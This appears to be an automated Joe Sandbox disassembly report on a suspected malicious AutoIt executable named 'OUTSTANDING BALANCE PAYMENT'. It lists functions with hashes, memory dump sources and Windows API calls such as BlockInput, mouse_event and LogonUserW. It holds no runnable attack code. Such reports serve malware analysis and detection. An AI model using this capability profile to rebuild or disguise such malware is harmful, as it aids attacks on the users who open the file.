                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002A81BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: d6947f1e2634d85dac29f269a0f94a69b07e9328e5b32b3ca68bc966bb6ebb71
                                                                  • Instruction ID: ea10b86ec4a792d74e9e08712fd5f0936d225d31aab35f9e72bd5cb4c9b01077
                                                                  • Opcode Fuzzy Hash: d6947f1e2634d85dac29f269a0f94a69b07e9328e5b32b3ca68bc966bb6ebb71
                                                                  • Instruction Fuzzy Hash: 46B09235045608ABDB022BE1EC19B597FACEB08752F004092F60D440618B7254108A92
                                                                  Function 002AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8265a2d6f0c6005a34d767919353e5cc8e5b046c379be2064e4cee5cc807466c
                                                                  • Instruction ID: 906281ecb87d0361a6ef704569efc9ebb5d5691a23ff3eb141200e3971010410
                                                                  • Opcode Fuzzy Hash: 8265a2d6f0c6005a34d767919353e5cc8e5b046c379be2064e4cee5cc807466c
                                                                  • Instruction Fuzzy Hash: B632E521D39F424ED7235634D822336A29DAFBB3D4F15D727E81AB5DA6DF29C4934100
                                                                  Function 002896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: c69b45f11cfe094bae981c7c46351011fee833c685ee075107aa0f4ba45d369d
                                                                  • Instruction ID: 61ce9f121dcf47529579bfc7e1aaf598f977a8c5680ad38b22e12ddd2064cc62
                                                                  • Opcode Fuzzy Hash: c69b45f11cfe094bae981c7c46351011fee833c685ee075107aa0f4ba45d369d
                                                                  • Instruction Fuzzy Hash: 0D22DB756293019FD724EF14C890B6FB7E4AF84350F24492DF99A87291DB71E8A4CF82
                                                                  Function 002B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9a1bf01560231fd7b93e70381fc06ea8820d3d5a64929331f133395b6481a3c
                                                                  • Instruction ID: 94839e92abeb6c6e21cede436479c2518ed139bb76ebdbf659e27bfc2c43811d
                                                                  • Opcode Fuzzy Hash: b9a1bf01560231fd7b93e70381fc06ea8820d3d5a64929331f133395b6481a3c
                                                                  • Instruction Fuzzy Hash: 35B1CD20D2AF418DD62396398871336B65CAFBF3D5F92D71BFC2A74D62EB2185934180
                                                                  Function 002CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 002CB6DF
                                                                    • Part of subcall function 002A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002CBDC3,00000000,?,?,?,?,002CBF70,00000000,?), ref: 002A3453
                                                                    • Part of subcall function 002A344A: __aulldiv.LIBCMT ref: 002A3473
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: 9162866a0190b064a01673967f011ce1fd7f1a6dda06c9867f15ac1b4fc60e27
                                                                  • Instruction ID: a8778b08575c6de24fe1f5d7e0afacfbba1ea6c0b8ee481b76ec18ef1ee122d5
                                                                  • Opcode Fuzzy Hash: 9162866a0190b064a01673967f011ce1fd7f1a6dda06c9867f15ac1b4fc60e27
                                                                  • Instruction Fuzzy Hash: 2321A2766345108BC72ACF28C481B92B7E5EB95310F248E6DE4E5CF2C0CB74B915CB54
                                                                  Function 002D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 002D6ACA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: da2c57ad4117568a3934af36b2e09690a7cbdc2caff6182d1d4806afa91b3cc0
                                                                  • Instruction ID: faed26ddebe500ae413d6add790bd4887ff93e97dd9c6aa8795f4f9b0ff4659c
                                                                  • Opcode Fuzzy Hash: da2c57ad4117568a3934af36b2e09690a7cbdc2caff6182d1d4806afa91b3cc0
                                                                  • Instruction Fuzzy Hash: 5DE01239220204AFC700EF99D404956B7EDAF64751F058417E945D7391DAB0E8148B90
                                                                  Function 002C74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002C74DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: f31c771bf82c47a40cbfd39b5f9d5c10aceb6744b13ca46b52aaf12153620da7
                                                                  • Instruction ID: 9dabd9374b59b68c38401dbeac84ce9b14a57b18fe2a79382d0db31b2a4cd967
                                                                  • Opcode Fuzzy Hash: f31c771bf82c47a40cbfd39b5f9d5c10aceb6744b13ca46b52aaf12153620da7
                                                                  • Instruction Fuzzy Hash: CAD05EA013C70639EC3D0B24CC1FF760928F3107C1F80838DB482C90C1B8C058259C32
                                                                  Function 002BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002BAD3E), ref: 002BB124
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 45821235f2d1dfcce9db11ff95dccbfd933ea9cdd23b79079f00d79f6211c6e5
                                                                  • Instruction ID: a6919e0cc2b15fd82710428980f8ff88f9b0d6f2ac72e01e1c8702976543c267
                                                                  • Opcode Fuzzy Hash: 45821235f2d1dfcce9db11ff95dccbfd933ea9cdd23b79079f00d79f6211c6e5
                                                                  • Instruction Fuzzy Hash: 01D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D531AB50
                                                                  Function 002FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: 8b4d804d24824abfe17ec29112e99cdc15a11399f65b7a3a2c49aad0e4784b51
                                                                  • Instruction ID: 4d19ee45f7c48a092bd4e8db2e383c2d2e40ffe90698e478fa0917dc1fdd6c5a
                                                                  • Opcode Fuzzy Hash: 8b4d804d24824abfe17ec29112e99cdc15a11399f65b7a3a2c49aad0e4784b51
                                                                  • Instruction Fuzzy Hash: 3FC04CF141114DDFD752CBC4C9449EEB7BCAB04301F1040929249F1110D7709B459B72
                                                                  Function 002A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002A818F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 686a29d70e1220cb719b72122d77d11e6f13c5c0f8bab81302122c40fa434df4
                                                                  • Instruction ID: fdbf1e79df9dd8a7cf2486451cbabb6283267b82ba1fb5d12be198e135988e5a
                                                                  • Opcode Fuzzy Hash: 686a29d70e1220cb719b72122d77d11e6f13c5c0f8bab81302122c40fa434df4
                                                                  • Instruction Fuzzy Hash: E5A0113000020CABCF022B82EC088883FACEA002A0B0000A2F80C000208B22A8208A82
                                                                  Function 002893F0 Relevance: .5, Instructions: 531COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39c7abd227d3bcc20cdb96fbc4d1a097f170c0eeb2d33b7b1a3b607e8a36ba2e
                                                                  • Instruction ID: 28a2ffbfbbfc8c0f80e6d5dfff4d6a03d0d7eae4f2010a538f1cdd83ffbf281a
                                                                  • Opcode Fuzzy Hash: 39c7abd227d3bcc20cdb96fbc4d1a097f170c0eeb2d33b7b1a3b607e8a36ba2e
                                                                  • Instruction Fuzzy Hash: C3126C74A11609EFDF04EFA4D985AAEF7F9FF48300F148529E406E7290EB35A964CB50
                                                                  Function 0028E3E3 Relevance: .5, Instructions: 521COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 413f76cb204a5fd635601260efdbffada7e97813931b3e6247d9c8a15014dabd
                                                                  • Instruction ID: ae9b893943f707b12a374a95eac62999237fd019b58e41c0339acaf23227abbc
                                                                  • Opcode Fuzzy Hash: 413f76cb204a5fd635601260efdbffada7e97813931b3e6247d9c8a15014dabd
                                                                  • Instruction Fuzzy Hash: 9312D078A2121ACFDF24EF54C480ABEF7B0FF14314F168069D94A9B391E375A961CB91
                                                                  Function 0028AF50 Relevance: .5, Instructions: 514COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3728558374-0
                                                                  • Opcode ID: 766cbe18f5d28bda4818cee0c8c3cacbe26879608481d5d573a6f47cba64c924
                                                                  • Instruction ID: 530ae8ee26e92a527d600efaa4952e2b929affd34b2e3fc7904b9b702420063b
                                                                  • Opcode Fuzzy Hash: 766cbe18f5d28bda4818cee0c8c3cacbe26879608481d5d573a6f47cba64c924
                                                                  • Instruction Fuzzy Hash: 6102C270A21109DFCF05EF64D981ABEB7B5FF44300F108069E906EB295EB35DA25CB91
                                                                  Function 002A02A4 Relevance: .3, Instructions: 345COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction ID: 739a82e03d5368a7e4446a6b3d61b1addae6162336915c59934f132fd2aeae5d
                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction Fuzzy Hash: 5EC1B7322251930BDFAD4A3985B443EFBA15A92BB531A076DD8F3CB4D6EF20C534D620
                                                                  Function 002A06D9 Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction ID: ac24a0d548214e3dbd7a0a7655e5299f07088048a6633acf032d933b5d260a1e
                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction Fuzzy Hash: 9DC1A4322251930ADFAD4A39C5B453EFAA15AA3BB131A076DD4F3CB4D6EF20D534D620
                                                                  Function 0029FE6F Relevance: .3, Instructions: 331COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: d7b8d25ada23ca830a479bbc31dcf8845e2469d58cc6fa556d268eb6c746146c
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: D3C1C3322251930ADFAD8A3AC57453EFAA15AA27B131A077DD4F3CB4D6EF20C574D620
                                                                  Function 0029FA57 Relevance: .3, Instructions: 323COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 6405be58ae10bc317b3f93ebff3430fbdd294476933ddfc1c57d4b11ac83d97f
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 9AC1A33222519309DFED4A39C67443EBAA15EA2BB531A077DD4F2CB5D6EF20C534D620
                                                                  Function 002DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 002DA2FE
                                                                  • DeleteObject.GDI32(00000000), ref: 002DA310
                                                                  • DestroyWindow.USER32 ref: 002DA31E
                                                                  • GetDesktopWindow.USER32 ref: 002DA338
                                                                  • GetWindowRect.USER32(00000000), ref: 002DA33F
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002DA480
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002DA490
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA4D8
                                                                  • GetClientRect.USER32(00000000,?), ref: 002DA4E4
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002DA51E
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA540
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA553
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA55E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002DA567
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA576
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002DA57F
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA586
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002DA591
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA5A3
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0030D9BC,00000000), ref: 002DA5B9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002DA5C9
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002DA5EF
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002DA60E
